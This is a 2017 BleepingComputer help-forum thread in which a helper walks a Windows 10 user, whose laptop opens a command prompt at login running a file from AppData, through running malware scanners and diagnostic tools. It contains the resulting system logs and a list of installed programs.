Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

CMD prompt pops up and runs automatically upon starting pc


  • Please log in to reply
10 replies to this topic

#1 Lasz100

Lasz100

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:03:07 PM

Posted 26 February 2017 - 12:19 PM

Hi,

 

I am not sure if this is the right forum to ask this question, but here is my issue:

 

I have win 10 and recently when I start the laptop after signing in command prompt opens and automatically executes the following command in Appdata:

 

"C:\WINDOWS\system 32>start  "62aZTCPAOZAA9dHFR18p0 " C:\Users\User\Appdata \......"

 

I believe it is an infection. 

Can anyone advise me please what should I do the get rid of it?

 

Thanks a lot


Edited by hamluis, 26 February 2017 - 05:26 PM.
Moved from W10 Spt to Am I Infected - Hamluis.


BC AdBot (Login to Remove)

 


#2 Broni

Broni

    The Coolest BC Computer


  • BC Advisor
  • 42,611 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Daly City, CA
  • Local time:02:07 PM

Posted 26 February 2017 - 09:47 PM

Welcome aboard p22002758.gif

 

p22002970.gif Download Security Check from here or here and save it to your Desktop.

  • Double-click SecurityCheck.exe
  • Follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.


NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.
NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run

p22002970.gif Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center/Action Center
    • Windows Update
    • Windows Defender
    • Other Services
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.


p22002970.gif Please download MiniToolBox and run it.

Checkmark following boxes:
  • Report IE Proxy Settings
  • Report FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List Winsock Entries
  • List last 10 Event Viewer log
  • List Installed Programs
  • List Devices (do NOT change any settings here)
  • List Users, Partitions and Memory size
  • List Restore Points

Click Go and post the result.

p22002970.gif Please download Malwarebytes to your desktop.
  • Double-click mb3-setup-1878.1878-3.4.5.2467.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.


p22002970.gifDownload 51a5f31352b88-icon_MBAR.pngMalwarebytes Anti-Rootkit (MBAR) to your desktop.
  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click "Next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
  • When the scan is finished and no malware has been found select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder located on your Desktop and paste the content of the following files in your next reply:
  • "mbar-log-{date} (xx-xx-xx).txt"
  • "system-log.txt"


NOTE. If you see This version requires you to completely exit the Anti Malware application message right click on the Malwarebytes Anti-Malware icon in the system tray and click on Exit.

p22002970.gif Please download Rkill (courtesy of BleepingComputer.com) to your desktop.
There are 2 different versions. If one of them won't run then download and try to run the other one.
You only need to get one of these to run, not all of them. You may get warnings from your antivirus about this tool, ignore them or shutdown your antivirus.

rKill.exe: http://www.bleepingcomputer.com/download/rkill/dl/10/
iExplore.exe (renamed rKill.exe): http://www.bleepingcomputer.com/download/rkill/dl/11/

  • Double-click on the Rkill desktop icon to run the tool.
  • If using Windows Vista, 7 or 8 right-click on it and choose Run As Administrator.
  • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
  • If not, delete the file, then download and use the one provided in Link 2.
  • Do not reboot until instructed.
  • If the tool does not run from any of the links provided, please let me know.


If normal mode still doesn't work, run the tool from safe mode.

When the scan is done Notepad will open with rKill log.
Post it in your next reply.

NOTE. rKill.txt log will also be present on your desktop.

NOTE Do NOT wrap your logs in "quote" or "code" brackets.
Do NOT use spoilers.
Do NOT edit your reply to post additional logs. Create new reply. I'll not get any email notifications about edits so I won't know you posted something new.


My Website

p4433470.gif

My help doesn't cost a penny, but if you'd like to consider a donation, click p22001735.gif


 


#3 Lasz100

Lasz100
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:03:07 PM

Posted 27 February 2017 - 01:05 PM

Hi Broni,

 

Below is the content of checkup.txt:

 

 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Windows Defender   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Java 8 Update 111  
 Microsoft VisualStudio JavaScript Project System 
 Microsoft VisualStudio JavaScript Language Service 
 Java version 32-bit out of Date! 
 Adobe Flash Player 24.0.0.194  
 Mozilla Firefox (50.1.0) 
 Google Chrome (56.0.2924.87) 
 Google Chrome (SetupMetrics...) 
````````Process Check: objlist.exe by Laurent````````  
 Windows Defender MSMpEng.exe 
 Windows Defender MSASCui.exe 
 Windows Defender MpCmdRun.exe   
 Windows Defender MSASCuiL.exe   
 Windows Defender MSASCui.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 


#4 Broni

Broni

    The Coolest BC Computer


  • BC Advisor
  • 42,611 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Daly City, CA
  • Local time:02:07 PM

Posted 27 February 2017 - 09:25 PM

Go on...


My Website

p4433470.gif

My help doesn't cost a penny, but if you'd like to consider a donation, click p22001735.gif


 


#5 Lasz100

Lasz100
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:03:07 PM

Posted 28 February 2017 - 12:01 PM

The output file of FSS:

 

Farbar Service Scanner Version: 27-01-2016
Ran by Lac (administrator) on 28-02-2017 at 10:59:12
Running from "C:\Users\Lac\Downloads"
Microsoft Windows 10 Home  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Security Center:
============
 
 
Windows Update:
============
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****
 
 
 
 
Running the others...


#6 Lasz100

Lasz100
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:03:07 PM

Posted 28 February 2017 - 12:06 PM

Here is output from MTB:

 

MiniToolBox by Farbar  Version: 17-06-2016
Ran by Lac (administrator) on 28-02-2017 at 11:05:04
Running from "C:\Users\Lac\Downloads"
Microsoft Windows 10 Home  (X64)
Model: X550CA Manufacturer: ASUSTeK COMPUTER INC.
Boot Mode: Normal
***************************************************************************
 
========================= IE Proxy Settings: ============================== 
 
Proxy is not enabled.
ProxyServer: http=127.0.0.1:49187;https=127.0.0.1:49187
 
"Reset IE Proxy Settings": IE Proxy Settings were reset.
========================= Hosts content: =================================
127.0.0.1       localhost
========================= Winsock entries =====================================
 
Catalog5 01 C:\WINDOWS\SysWoW64\napinsp.dll [55808] (Microsoft Corporation)
Catalog5 02 C:\WINDOWS\SysWoW64\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 03 C:\WINDOWS\SysWoW64\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 04 C:\WINDOWS\SysWoW64\NLAapi.dll [65024] (Microsoft Corporation)
Catalog5 05 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog5 06 C:\WINDOWS\SysWoW64\winrnr.dll [24064] (Microsoft Corporation)
Catalog9 01 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 02 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 03 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 04 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 05 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 06 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 07 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 08 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 09 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 10 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 11 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 12 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\napinsp.dll [67584] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\NLAapi.dll [80896] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [31744] (Microsoft Corporation)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 11 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 12 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
 
========================= Event log errors: ===============================
 
Application errors:
==================
Error: (02/28/2017 10:54:04 AM) (Source: Perflib) (User: )
Description: WmiApRplC:\WINDOWS\system32\wbem\wmiaprpl.dll8
 
Error: (02/28/2017 10:53:44 AM) (Source: PerfNet) (User: )
Description: 
 
Error: (02/28/2017 10:53:40 AM) (Source: Perflib) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
 
Error: (02/28/2017 10:49:28 AM) (Source: MsiInstaller) (User: LASZLO)
Description: Product: HP Deskjet 4640 series Basic Device Software -- Error 25024. Error -2081883395: Failed to uninstall device with serial number: CN4B74B3DP05Z4.
 
Error: (02/28/2017 10:44:58 AM) (Source: Application Hang) (User: )
Description: The program FSS.exe version 27.1.2016.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: c1c
 
Start Time: 01d29124a088aeee
 
Termination Time: 4294967295
 
Application Path: C:\Users\Lac\Downloads\FSS.exe
 
Report Id: 3c557f79-fdd5-11e6-bf0d-bcee7b2e15bc
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (02/27/2017 07:02:23 PM) (Source: Microsoft-Windows-Defrag) (User: )
Description: The volume OS (C:) was not optimised because an error was encountered: The parameter is incorrect. (0x80070057)
 
Error: (02/27/2017 06:45:13 PM) (Source: Microsoft-Windows-CAPI2) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (02/27/2017 01:19:05 PM) (Source: Microsoft-Windows-CAPI2) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (02/27/2017 01:18:38 PM) (Source: Perflib) (User: )
Description: W3SVC8
 
Error: (02/27/2017 01:18:37 PM) (Source: Perflib) (User: )
Description: aspnet_stateC:\WINDOWS\System32\aspnet_counters.dll8
 
 
System errors:
=============
Error: (02/28/2017 11:04:23 AM) (Source: Service Control Manager) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service terminated unexpectedly. It has done this 10 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (02/28/2017 11:03:22 AM) (Source: Service Control Manager) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service terminated unexpectedly. It has done this 9 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (02/28/2017 11:02:22 AM) (Source: Service Control Manager) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service terminated unexpectedly. It has done this 8 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (02/28/2017 11:01:21 AM) (Source: Service Control Manager) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service terminated unexpectedly. It has done this 7 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (02/28/2017 11:00:20 AM) (Source: Service Control Manager) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service terminated unexpectedly. It has done this 6 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (02/28/2017 10:59:19 AM) (Source: Service Control Manager) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service terminated unexpectedly. It has done this 5 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (02/28/2017 10:58:18 AM) (Source: Service Control Manager) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service terminated unexpectedly. It has done this 4 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (02/28/2017 10:57:11 AM) (Source: Service Control Manager) (User: )
Description: The SQL Server Reporting Services (MSSQLSERVER) service terminated unexpectedly. It has done this 3 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (02/28/2017 10:57:09 AM) (Source: DCOM) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}
 
Error: (02/28/2017 10:56:44 AM) (Source: Service Control Manager) (User: )
Description: The Background Intelligent Transfer Service service did not respond on starting.
 
 
Microsoft Office Sessions:
=========================
Error: (02/28/2017 10:54:04 AM) (Source: Perflib)(User: )
Description: WmiApRplC:\WINDOWS\system32\wbem\wmiaprpl.dll8
 
Error: (02/28/2017 10:53:44 AM) (Source: PerfNet)(User: )
Description: 
 
Error: (02/28/2017 10:53:40 AM) (Source: Perflib)(User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
 
Error: (02/28/2017 10:49:28 AM) (Source: MsiInstaller)(User: LASZLO)
Description: Product: HP Deskjet 4640 series Basic Device Software -- Error 25024. Error -2081883395: Failed to uninstall device with serial number: CN4B74B3DP05Z4.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (02/28/2017 10:44:58 AM) (Source: Application Hang)(User: )
Description: FSS.exe27.1.2016.0c1c01d29124a088aeee4294967295C:\Users\Lac\Downloads\FSS.exe3c557f79-fdd5-11e6-bf0d-bcee7b2e15bc
 
Error: (02/27/2017 07:02:23 PM) (Source: Microsoft-Windows-Defrag)(User: )
Description: OS (C:)The parameter is incorrect. (0x80070057)
 
Error: (02/27/2017 06:45:13 PM) (Source: Microsoft-Windows-CAPI2)(User: )
Description: 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
 
Error: (02/27/2017 01:19:05 PM) (Source: Microsoft-Windows-CAPI2)(User: )
Description: 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
 
Error: (02/27/2017 01:18:38 PM) (Source: Perflib)(User: )
Description: W3SVC8
 
Error: (02/27/2017 01:18:37 PM) (Source: Perflib)(User: )
Description: aspnet_stateC:\WINDOWS\System32\aspnet_counters.dll8
 
 
CodeIntegrity Errors:
===================================
  Date: 2017-01-25 10:32:03.809
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:32:03.808
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:32:03.786
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:32:03.120
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:32:03.118
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:32:03.114
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:32:01.989
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:32:01.988
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:32:01.985
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-01-25 10:14:57.671
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
=========================== Installed Programs ============================
 
%SQL_PRODUCT_SHORT_NAME% Data Tools - BI for Visual Studio 2013 (HKLM-x32\...\{B0966B41-F778-41B1-98DB-145885CD2213}) (Version: 12.0.2430.0 - Microsoft Corporation) Hidden
%SQL_PRODUCT_SHORT_NAME% SSIS 64Bit For SSDTBI (HKLM\...\{B94FEEA2-93E4-4682-942C-140C2BCECD29}) (Version: 12.0.2430.0 - Microsoft Corporation) Hidden
Active Directory Authentication Library for SQL Server (HKLM\...\{32C0D7B2-1046-43AC-98AD-B748E1910916}) (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Active Directory Authentication Library for SQL Server (x86) (HKLM-x32\...\{F40FA676-46B1-4609-85EF-D2F1F79E0C0E}) (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
ActiveState Komodo Edit 9.3.2 (HKLM-x32\...\{7925EF85-6AF6-40DD-89F8-6E2D9C488ED9}) (Version: 9.3.2 - ActiveState Software Inc.)
Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Digital Editions 4.5 (HKLM-x32\...\Adobe Digital Editions 4.5) (Version: 4.5.2 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.221 - Adobe Systems Incorporated)
AdventureWorksBI (HKLM-x32\...\{A90036CE-E7B2-4C42-B52D-B2843BC31884}) (Version: 9.00.70430.00 - Microsoft)
AdventureWorksDBAMD64 (HKLM\...\{7D95B533-4BA1-4EED-8096-EFCB6DD6B95F}) (Version: 9.00.70430.00 - Microsoft)
AdventureWorksLT_x64 (HKLM\...\{04301026-620F-443F-94C3-AE9486DABD29}) (Version: 9.00.70430.00 - Microsoft)
Amnesia - The Dark Descent (HKLM-x32\...\GOGPACKAMNESIA_is1) (Version: 2.0.0.2 - GOG.com)
Amnesia (HKLM\...\{a48e983a-39ba-41bb-947f-9393b9081ca4}.sdb) (Version:  - )
ASUS InstantOn (HKLM-x32\...\{749F674B-2674-47E8-879C-5626A06B2A91}) (Version: 3.0.5 - ASUS)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.1.9 - ASUS)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.1.9 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{9B6239BF-4E85-4590-8D72-51E30DB1A9AA}) (Version: 2.1.7 - ASUS)
ASUS Screen Saver (HKLM\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.1 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.12 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 3.13.0004 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 2.1.5 - ASUS)
ASUS WebStorage Sync Agent (HKLM-x32\...\ASUS WebStorage) (Version: 1.1.18.159 - ASUS Cloud Corporation)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5710.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5710.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.309 - ASUSTEK)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0039 - ASUS)
Build Tools - amd64 (HKLM\...\{F74753A3-C93C-34F5-A199-993CAF602B7D}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools - x86 (HKLM-x32\...\{FB3A15FD-FC67-3A2F-892B-6890B0C56EA9}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools Language Resources - amd64 (HKLM\...\{05198C22-FFCE-374A-B190-9F18CC99DAEA}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools Language Resources - x86 (HKLM-x32\...\{9347889B-C22A-3905-901F-C05D8F73C929}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
calibre (HKLM-x32\...\{9AB9E32A-236E-4A1E-AE76-367C8798A338}) (Version: 2.74.0 - Kovid Goyal)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.1.0.0 - Citrix Systems, Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
ELAN Touchpad 15.8.4.3_X64_WHQL (HKLM\...\Elantech) (Version: 15.8.4.3 - ELAN Microelectronic Corp.)
Entity Framework 6.1.3 Tools  for Visual Studio 2015 Update 1 (HKLM-x32\...\{2A56910C-69C8-495D-8ED8-9080F0A14E58}) (Version: 14.0.41103.0 - Microsoft Corporation)
ffdshow v1.2.4422 [2012-04-09] (HKLM-x32\...\ffdshow_is1) (Version: 1.2.4422.0 - FreeCodecPack)
FileZilla Client 3.9.0.6 (HKCU\...\FileZilla Client) (Version: 3.9.0.6 - Tim Kosse)
Fotogalerie (HKLM-x32\...\{3CBD94C1-BA15-488C-888B-D8DD296CC6DC}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Galerie de photos (HKLM-x32\...\{446CC8CE-0E90-44F7-ADD0-774B243EF090}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
GDR 2254 for SQL Server 2014 (KB2977315) (64-bit) (HKLM\...\KB2977315) (Version: 12.0.2254.0 - Microsoft Corporation)
GDR 2269 for SQL Server 2014 (KB3045324) (64-bit) (HKLM\...\KB3045324) (Version: 12.0.2269.0 - Microsoft Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.32.7 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Hotfix 2430 for SQL Server 2014 (KB2999197) (HKLM-x32\...\KB2999197) (Version: 12.0.2430.0 - Microsoft Corporation)
Hotfix 2569 for SQL Server 2014 (KB3158271) (64-bit) (HKLM\...\KB3158271) (Version: 12.0.2569.0 - Microsoft Corporation)
Hotfix 2569 for SQL Server 2014 (KB3158271) (HKLM-x32\...\KB3158271) (Version: 12.0.2569.0 - Microsoft Corporation)
HP Deskjet 4640 series Help (HKLM-x32\...\{8DF1C066-BBD8-4B9F-A5BC-AC555C9A872F}) (Version: 31.0.0 - Hewlett Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
